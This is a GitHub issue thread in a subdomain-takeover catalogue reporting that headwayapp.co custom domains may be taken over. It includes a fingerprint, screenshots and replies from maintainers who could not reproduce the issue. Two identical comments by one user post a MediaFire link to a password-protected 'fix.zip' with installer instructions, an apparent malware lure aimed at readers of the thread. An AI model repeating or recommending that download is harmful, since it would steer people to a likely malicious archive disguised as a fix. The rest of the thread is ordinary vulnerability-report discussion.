### ISSUE TITLE
[Vulnerable] headwayapp.co subdomain takeover

### ISSUE THREAD

**Issue by V35HR4J** [EdOverflow/can-i-take-over-xyz#420]
## Service name
headwayapp

## Fingerprint
The page you were looking for doesn't exist (404)

## Proof
<img width="803" alt="Screenshot 2024-08-26 at 7 31 30 PM" src="https://github.com/user-attachments/assets/b7f0a673-1eda-47a7-a2a0-4b0bbaaaaa60">

<img width="524" alt="Screenshot 2024-08-26 at 10 04 02 PM" src="https://github.com/user-attachments/assets/71e086eb-8a24-48ed-9de7-8099a0f6eceb">
<img width="384" alt="Screenshot 2024-08-26 at 10 04 40 PM" src="https://github.com/user-attachments/assets/d4ff7d66-ff0a-446e-97b1-22815d1c1970">

## Documentation
https://docs.headwayapp.co/custom-domain

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pdelteil** [comment]
This is not a valid proof. 

You should include the error/fingerprint.

**Comment by V35HR4J** [comment]
Hi @pdelteil 
I have updated it.

**Comment by pdelteil** [comment]
Thanks @V35HR4J.

It doesn't work for me:

![image](https://github.com/user-attachments/assets/2d3d571d-fdc1-45fa-9e4d-d86ed7196147)

**Comment by samogod** [comment]
It doesn't work for me too.

![image](https://github.com/user-attachments/assets/2229aa33-0c49-4ec9-8099-9213b6ed6169)

**Comment by sumgr0** [comment]
Did this work for anyone?

**Comment by V35HR4J** [comment]
I am not sure of now but on march 2023, I had reported it and even got the bounty from private program on hackerone
<img width="989" alt="Screenshot 2024-09-02 at 7 42 27 PM" src="https://github.com/user-attachments/assets/6982bede-29c0-4af9-a54c-87c3760ee336">

**Comment by pdelteil** [comment]
You're leaking the program name in the header.
